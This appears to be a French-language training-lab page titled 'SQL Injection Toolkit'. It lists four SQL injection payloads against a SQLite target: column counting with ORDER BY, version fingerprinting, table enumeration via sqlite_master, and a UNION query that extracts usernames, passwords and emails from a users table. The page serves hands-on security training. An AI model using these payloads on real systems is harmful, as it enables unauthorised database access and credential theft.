← LAB_HOME
← Retour au Lab

RED_TEAM / SQL_BREACH

SQL INJECTION TOOLKIT

Arsenal d'exploitation SQLi pour extraction de données

01 // RECONNAISSANCE

Déterminez le nombre de colonnes retournées par la requête originale en utilisant ORDER BY jusqu'à l'erreur.

' ORDER BY 4--

02 // FINGERPRINTING

Identifiez la version du moteur de base de données (SQLite dans ce lab).

' UNION SELECT 1, sqlite_version(), 3, 4--

03 // ÉNUMÉRATION DES TABLES

Liste toutes les tables système définies dans la DB.

' UNION SELECT 1, name, sql, 4 FROM sqlite_master--

04 // EXTRACTION DE DONNÉES

Volez les identifiants de la table users.

' UNION SELECT id, username, password, email FROM users--

// CONSOLE_DIRECTE

Lancez l'interface cible pour tester vos payloads.

OUVRIR LA CIBLE